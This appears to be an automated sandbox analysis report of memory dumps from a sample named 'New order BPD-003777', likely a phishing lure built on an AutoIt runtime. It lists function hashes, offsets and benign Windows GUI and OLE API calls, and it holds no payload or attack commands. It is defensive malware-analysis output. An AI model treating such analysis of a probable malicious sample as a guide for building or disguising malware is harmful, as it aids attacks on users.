Source File: 00000000.00000002.1778371104.000000000146B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0146B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146b000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 602bc35120b49dae537710601214844de49f567498fbc3e1c6a6123a49de7074
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: DA019278A10109EFCB44DF99C5909AEF7F9FB88314F60859AD819A7311D730AE51DB81

Function 0146E608 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1778371104.000000000146B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0146B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146b000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: aa048c040d38d791ee3c07798db693f96afbc0eba401ebe9cfde932eb50be02e
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 4E019278A00209EFCB44DF98C5909AEF7F9FB48314F60859AD819A7311D730AE42DB81

Function 0146CFA8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1778371104.000000000146B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0146B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146b000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 003170D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0031712F
GetSysColorBrush.USER32(0000000F), ref: 00317160
GetSysColor.USER32(0000000F), ref: 0031716C
SetBkColor.GDI32(?,000000FF), ref: 00317186
SelectObject.GDI32(?,?), ref: 00317195
InflateRect.USER32(?,000000FF,000000FF), ref: 003171C0
GetSysColor.USER32(00000010), ref: 003171C8
CreateSolidBrush.GDI32(00000000), ref: 003171CF
FrameRect.USER32(?,?,00000000), ref: 003171DE
DeleteObject.GDI32(00000000), ref: 003171E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00317230
FillRect.USER32(?,?,?), ref: 00317262
GetWindowLongW.USER32(?,000000F0), ref: 00317284

Part of subcall function 003173E8: GetSysColor.USER32(00000012), ref: 00317421
Part of subcall function 003173E8: SetTextColor.GDI32(?,?), ref: 00317425
Part of subcall function 003173E8: GetSysColorBrush.USER32(0000000F), ref: 0031743B
Part of subcall function 003173E8: GetSysColor.USER32(0000000F), ref: 00317446
Part of subcall function 003173E8: GetSysColor.USER32(00000011), ref: 00317463
Part of subcall function 003173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00317471
Part of subcall function 003173E8: SelectObject.GDI32(?,00000000), ref: 00317482
Part of subcall function 003173E8: SetBkColor.GDI32(?,00000000), ref: 0031748B
Part of subcall function 003173E8: SelectObject.GDI32(?,?), ref: 00317498
Part of subcall function 003173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 003174B7
Part of subcall function 003173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003174CE
Part of subcall function 003173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 003174DB

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 299b2ff64e63cfc6b7597efa00f85c55d96b214c2793ab1e63c03fe4bf55837b
Instruction ID: e0117aa62ff850843d243024959645a17eab45af326beda9e10dada3fc983cff
Opcode Fuzzy Hash: 299b2ff64e63cfc6b7597efa00f85c55d96b214c2793ab1e63c03fe4bf55837b
Instruction Fuzzy Hash: 08A1BF72058301FFDB069F60DC48A9B7BBAFB4D320F145A29F962961E0D770E985CB51

Function 00298D85 Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00298E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 002D6AC5
6F550200.COMCTL32(?,000000FF,?), ref: 002D6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002D6F43

Part of subcall function 00298F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00298BE8,?,00000000,?,?,?,?,00298BBA,00000000,?), ref: 00298FC5

SendMessageW.USER32(?,00001053), ref: 002D6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002D6F96

Strings

0, xrefs: 002D6DCF

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: MessageSend$Window$DestroyF550200InvalidateMoveRect
String ID: 0
API String ID: 268457297-4108050209
Opcode ID: 78666a48165ede4ec9bb860cde9da8a6e12b4c218711a047b8be2578ddf435a3
Instruction ID: 972c2d457559b85e94faa19c83a517319fd1d35b29ea439595666cbcbc41dfef
Opcode Fuzzy Hash: 78666a48165ede4ec9bb860cde9da8a6e12b4c218711a047b8be2578ddf435a3
Instruction Fuzzy Hash: FB12AF30620212DFDB26CF24D858BB9B7E5FB49305F18846AF4958B661CB71EC61CF91

Function 003173E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00317421
SetTextColor.GDI32(?,?), ref: 00317425
GetSysColorBrush.USER32(0000000F), ref: 0031743B
GetSysColor.USER32(0000000F), ref: 00317446
CreateSolidBrush.GDI32(?), ref: 0031744B
GetSysColor.USER32(00000011), ref: 00317463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00317471
SelectObject.GDI32(?,00000000), ref: 00317482
SetBkColor.GDI32(?,00000000), ref: 0031748B
SelectObject.GDI32(?,?), ref: 00317498
InflateRect.USER32(?,000000FF,000000FF), ref: 003174B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003174CE
GetWindowLongW.USER32(00000000,000000F0), ref: 003174DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0031752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00317554
InflateRect.USER32(?,000000FD,000000FD), ref: 00317572
DrawFocusRect.USER32(?,?), ref: 0031757D
GetSysColor.USER32(00000011), ref: 0031758E
SetTextColor.GDI32(?,00000000), ref: 00317596
DrawTextW.USER32(?,003170F5,000000FF,?,00000000), ref: 003175A8
SelectObject.GDI32(?,?), ref: 003175BF
DeleteObject.GDI32(?), ref: 003175CA
SelectObject.GDI32(?,?), ref: 003175D0
DeleteObject.GDI32(?), ref: 003175D5
SetTextColor.GDI32(?,?), ref: 003175DB
SetBkColor.GDI32(?,?), ref: 003175E5

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 894ec513b4e0d7daa6ca8619708fd871c83b64bb9fc02850f4360c6f614cbfdf
Instruction ID: 0d84896292fb51ce7911dfe2b2c51f8395c24f4bf4c6952272379ac323425b78
Opcode Fuzzy Hash: 894ec513b4e0d7daa6ca8619708fd871c83b64bb9fc02850f4360c6f614cbfdf
Instruction Fuzzy Hash: 65616D72940218BFDF069FA4DC49AEEBFB9EB0D320F159125F911AB2A1D7709940CF90

Function 00298891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00298968
GetSystemMetrics.USER32(00000007), ref: 00298970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0029899B
GetSystemMetrics.USER32(00000008), ref: 002989A3
GetSystemMetrics.USER32(00000004), ref: 002989C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002989E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002989F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00298A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00298A3C
GetClientRect.USER32(00000000,000000FF), ref: 00298A5A
GetStockObject.GDI32(00000011), ref: 00298A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00298A81

Part of subcall function 0029912D: GetCursorPos.USER32(?), ref: 00299141
Part of subcall function 0029912D: ScreenToClient.USER32(00000000,?), ref: 0029915E
Part of subcall function 0029912D: GetAsyncKeyState.USER32(00000001), ref: 00299183
Part of subcall function 0029912D: GetAsyncKeyState.USER32(00000002), ref: 0029919D

SetTimer.USER32(00000000,00000000,00000028,002990FC), ref: 00298AA8

Strings

AutoIt v3 GUI, xrefs: 00298A20

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 42120b2609c18a693b20c0a436164c045a23d20faeeb12031d75bd36844d1dc3
Instruction ID: cb1b63d06969cdf15d247d78b6267c1c185342539eb3170e05eed5cb73a7a2ef
Opcode Fuzzy Hash: 42120b2609c18a693b20c0a436164c045a23d20faeeb12031d75bd36844d1dc3
Instruction Fuzzy Hash: D5B17C31A5020A9FDF15DFA8C849BEE7BB5FB48315F14412AFA15EB2A0DB74A850CF50

Function 00287778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

Cannot parse #include, xrefs: 002C5279
", xrefs: 002C5153
#include-once, xrefs: 0028782F
Bad directive syntax error, xrefs: 002C519A
#cs, xrefs: 00287873, 002878C5
', xrefs: 002C5169
#ce, xrefs: 002878ED
#comments-end, xrefs: 002878D9
#notrayicon, xrefs: 002877E7
Unterminated group of comments, xrefs: 002C528C
#include, xrefs: 00287847
#requireadmin, xrefs: 002877FF
#comments-start, xrefs: 0028785F, 002878B1
#pragma compile, xrefs: 002877D3
#OnAutoItStartRegister, xrefs: 00287817

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 1e5a7c17bc017d47abaaa09adb7c83ca2ea5f2a43e4f39a0fd286874c78c5f6c
Instruction ID: 2bc470ba1ff919515e76a5f457e613dedf6370ca56337d5d8cd03805cdca46b8
Opcode Fuzzy Hash: 1e5a7c17bc017d47abaaa09adb7c83ca2ea5f2a43e4f39a0fd286874c78c5f6c
Instruction Fuzzy Hash: AB810675675616ABDB11BF60CD42FEE77A8AF15300F144024FC08AA1D6EB70D9B1CBA1

Function 0028326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00351990), ref: 002C2F8D
GetMenuItemCount.USER32(00351990), ref: 002C303D
GetCursorPos.USER32(?), ref: 002C3081
SetForegroundWindow.USER32(00000000), ref: 002C308A
TrackPopupMenuEx.USER32(00351990,00000000,?,00000000,00000000,00000000), ref: 002C309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002C30A9

Strings

0, xrefs: 0028327D

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: c10cc052520933d4a71c64bb8de7c8f4a4c261a9bd541cffcce2a46b641f3cc4
Instruction ID: 28b4bc5f9a0293b2f233f2261e5e1c490732591a3daa1bd64d6d56430448263d
Opcode Fuzzy Hash: c10cc052520933d4a71c64bb8de7c8f4a4c261a9bd541cffcce2a46b641f3cc4
Instruction Fuzzy Hash: 0E71F971665206BEEB21DF29CC49F9ABF69FF05724F20421AF514661E0CBB1AD34CB90

Function 002F14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 002F1502
VariantCopy.OLEAUT32(?,?), ref: 002F150B
VariantClear.OLEAUT32(?), ref: 002F1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002F15FB
VarR8FromDec.OLEAUT32(?,?), ref: 002F1657
VariantInit.OLEAUT32(00304AFE), ref: 002F1708
SysFreeString.OLEAUT32(?), ref: 002F178C
VariantClear.OLEAUT32(00304AFE), ref: 002F17D8
VariantClear.OLEAUT32(00304AFE), ref: 002F17E7
VariantInit.OLEAUT32(00000000), ref: 002F1823

Strings

Default, xrefs: 002F16AF
%4d%02d%02d%02d%02d%02d, xrefs: 002F1625

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: b092f5f745301294f006f18538e313332a430f2d817f6de668d9cef57c44aee1
Instruction ID: f0db4b024f10b5211e1e6d6762d49c6ea8f19924ac3e516a35ffc686638f786e
Opcode Fuzzy Hash: b092f5f745301294f006f18538e313332a430f2d817f6de668d9cef57c44aee1
Instruction Fuzzy Hash: 15D10272A20219DBDF04AF65D885BB9F7B6BF45740F908066E606AB180DB70DC70DBA1

Function 002EBF30 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00351990,000000FF,00000000,00000030), ref: 002EBFAC
SetMenuItemInfoW.USER32(00351990,00000004,00000000,00000030), ref: 002EBFE1
Sleep.KERNEL32(000001F4), ref: 002EBFF3
GetMenuItemCount.USER32(?), ref: 002EC039
GetMenuItemID.USER32(?,00000000), ref: 002EC056
GetMenuItemID.USER32(?,-00000001), ref: 002EC082
GetMenuItemID.USER32(?,?), ref: 002EC0C9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002EC10F
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002EC124
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002EC145

Strings

0, xrefs: 002EBF3D

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 0e8eb6296c6bd034dd9d5a9810500625181ec73486037d3f7ce7e21ebad04a54
Instruction ID: bc9bf5c60004a58c9abca4ba6cff44b5a20b851dba3f652ef213fcb615a8b4fd
Opcode Fuzzy Hash: 0e8eb6296c6bd034dd9d5a9810500625181ec73486037d3f7ce7e21ebad04a54
Instruction Fuzzy Hash: 7B6193709A0386AFDF12CF96DC88AEE7B79EB05344FA04055F815A7291C771AD26CB60

Function 00299838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00299944: GetWindowLongW.USER32(?,000000EB), ref: 00299952

GetSysColor.USER32(0000000F), ref: 00299862

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 2546e8caadf594058f24a9570b65e035fa7bdf0b2c36514f03c7fd05f04f510b
Instruction ID: 87b3c26b75626baffd79436f31a92bd0c8097de9b1eec06ec80e6ffe884e0183
Opcode Fuzzy Hash: 2546e8caadf594058f24a9570b65e035fa7bdf0b2c36514f03c7fd05f04f510b
Instruction Fuzzy Hash: 1641B031164640AFDF215F3C9C88BB93BA9BB0A330F14861DF9A2872E1E7319C91DB11

Function 00289F09 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 228COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,-00000032), ref: 0028A0E1

Strings

a, xrefs: 0028A066
9, xrefs: 0028A131
_, xrefs: 0028A0C2
=, xrefs: 0028A140
z, xrefs: 0028A06C
0, xrefs: 0028A0BC
Z, xrefs: 0028A060
A, xrefs: 0028A0B4
$, xrefs: 0028A032

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: BuffCharUpper
String ID: $$0$9$=$A$Z$_$a$z
API String ID: 3964851224-1136989504
Opcode ID: 17b865a3c2ddb75a230a0545e34bc8ec8a818efddbe8290a2ed87f56fd18e305
Instruction ID: 493b4741d075cb476d152f2ae59d2585c850e1d53e96cd9161f1d084a9bc4741
Opcode Fuzzy Hash: 17b865a3c2ddb75a230a0545e34bc8ec8a818efddbe8290a2ed87f56fd18e305
Instruction Fuzzy Hash: 5E81E279C2120A9BEF14FF98C880AFEB375EF18300F144127E512A71D1DB7499A5CB52

Function 002E96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,?,?,?,?,002C3B9D,?,0000138A), ref: 002E9717
LoadStringW.USER32(00000000,?,?,002C3B9D), ref: 002E9720

Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,002C3B9D,?,0000138A), ref: 002E9742
LoadStringW.USER32(00000000,?,?,002C3B9D), ref: 002E9745
MessageBoxW.USER32(00000000,?,?,00011010), ref: 002E9866

Strings

Line %d:, xrefs: 002E97A0
Error: , xrefs: 002E981D
^ ERROR, xrefs: 002E97FB
Line %d (File "%s"):, xrefs: 002E978F
%s (%d) : ==> %s: %s %s, xrefs: 002E984A

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 698fdf6862d17f5ad4f81a6a570d621cdf5ffda10266f3a7805328c29eea075c
Instruction ID: 9f53a899cd636ca8724f8a62cc4efd79095b9448df4fbcacaff752a4b7779c33
Opcode Fuzzy Hash: 698fdf6862d17f5ad4f81a6a570d621cdf5ffda10266f3a7805328c29eea075c
Instruction Fuzzy Hash: FB416C76851209AADF05FFE1CD46DEEB378AF19700F540065F20172092EA256FA9CFA1

Function 002DFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002DFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 002DFB08
VariantInit.OLEAUT32(?), ref: 002DFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 002DFB3A
VariantCopy.OLEAUT32(?,?), ref: 002DFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 002DFBA1
VariantClear.OLEAUT32(?), ref: 002DFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 002DFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002DFBCC
VariantClear.OLEAUT32(?), ref: 002DFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002DFBE9

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
